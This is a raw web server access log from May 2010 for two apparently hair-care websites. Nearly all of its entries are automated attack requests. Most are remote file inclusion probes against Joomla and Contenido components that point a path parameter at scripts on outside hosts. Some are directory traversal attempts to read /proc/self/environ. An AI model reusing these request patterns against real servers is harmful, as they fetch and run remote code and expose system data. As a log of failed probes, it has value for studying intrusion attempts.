74.124.198.60 - - [31/May/2010:09:31:36 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:31:36 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:31:36 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:31:40 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:31:40 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:31:40 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:31:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:31:47 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:31:47 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.91.137.94 - - [31/May/2010:09:32:06 -0700] "GET /logs//index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.91.137.94 - - [31/May/2010:09:32:06 -0700] "GET /logs/access_100412.log//index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.91.137.94 - - [31/May/2010:09:32:06 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:33:30 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:34:06 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:34:14 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:34:16 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:34:17 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
24.206.112.189 - - [31/May/2010:09:34:27 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:34:49 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:34:51 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:34:52 -0700] "GET /logs/access_100222.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
24.206.112.189 - - [31/May/2010:09:36:41 -0700] "GET /logs/access_100201.log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
24.206.112.189 - - [31/May/2010:09:36:42 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
24.206.112.189 - - [31/May/2010:09:36:42 -0700] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
24.206.112.189 - - [31/May/2010:09:38:34 -0700] "GET /logs/access_100201.log/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
24.206.112.189 - - [31/May/2010:09:38:34 -0700] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
24.206.112.189 - - [31/May/2010:09:38:34 -0700] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
212.91.137.94 - - [31/May/2010:09:40:55 -0700] "GET /index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.91.137.94 - - [31/May/2010:09:40:55 -0700] "GET /logs/access.log//index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.91.137.94 - - [31/May/2010:09:40:55 -0700] "GET /logs//index.php?option=com_extcalendar&Itemid=&mosConfig.absolute.path=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.47.80.39 - - [31/May/2010:09:43:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
193.47.80.39 - - [31/May/2010:09:43:39 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
64.119.131.71 - - [31/May/2010:09:45:21 -0700] "GET /?_zb_path=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.119.131.71 - - [31/May/2010:09:45:23 -0700] "GET /?_zb_path=http://rxv8.interfree.it/id.jpg?? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
85.153.27.146 - - [31/May/2010:09:45:44 -0700] "GET /logs/access_100503.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [31/May/2010:09:50:40 -0700] "GET /logs/access_100412.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:32 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:35 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:38 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:38 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:38 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:39 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:57 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:57 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:51:57 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:09:52:05 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:53:10 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.55.247.185 - - [31/May/2010:09:53:10 -0700] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.55.247.185 - - [31/May/2010:09:53:10 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
207.55.247.185 - - [31/May/2010:09:53:34 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:53:34 -0700] "GET /logs/access_100412.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:53:34 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:54:32 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:54:32 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:54:32 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
60.234.132.61 - - [31/May/2010:09:55:53 -0700] "GET /logs/access_100405.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
60.234.132.61 - - [31/May/2010:09:55:54 -0700] "GET /logs/access_100405.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
60.234.132.61 - - [31/May/2010:09:55:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
60.234.132.61 - - [31/May/2010:09:55:55 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
60.234.132.61 - - [31/May/2010:09:55:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
60.234.132.61 - - [31/May/2010:09:55:57 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
60.234.132.61 - - [31/May/2010:09:56:07 -0700] "GET /logs/access_100104.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
60.234.132.61 - - [31/May/2010:09:56:07 -0700] "GET /logs/access_100104.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:56:58 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:56:58 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:56:58 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [31/May/2010:09:57:03 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.255.60.172 - - [31/May/2010:10:00:31 -0700] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.oschub.cn//plugins/system/ts???? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "growlonghairfast.com"
89.255.60.172 - - [31/May/2010:10:00:31 -0700] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.oschub.cn//plugins/system/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:03:19 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:03:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:03:19 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:04:33 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:04:33 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:04:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:04:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:04:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:04:35 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.38.67.248 - - [31/May/2010:10:04:37 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:05:18 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:05:59 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:05:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:05:59 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:06:16 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:06:18 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:07:50 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:08:55 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:09:06 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:09:11 -0700] "GET /logs/access_100222.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:09:32 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:09:37 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [31/May/2010:10:09:43 -0700] "GET /logs/access_100405.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
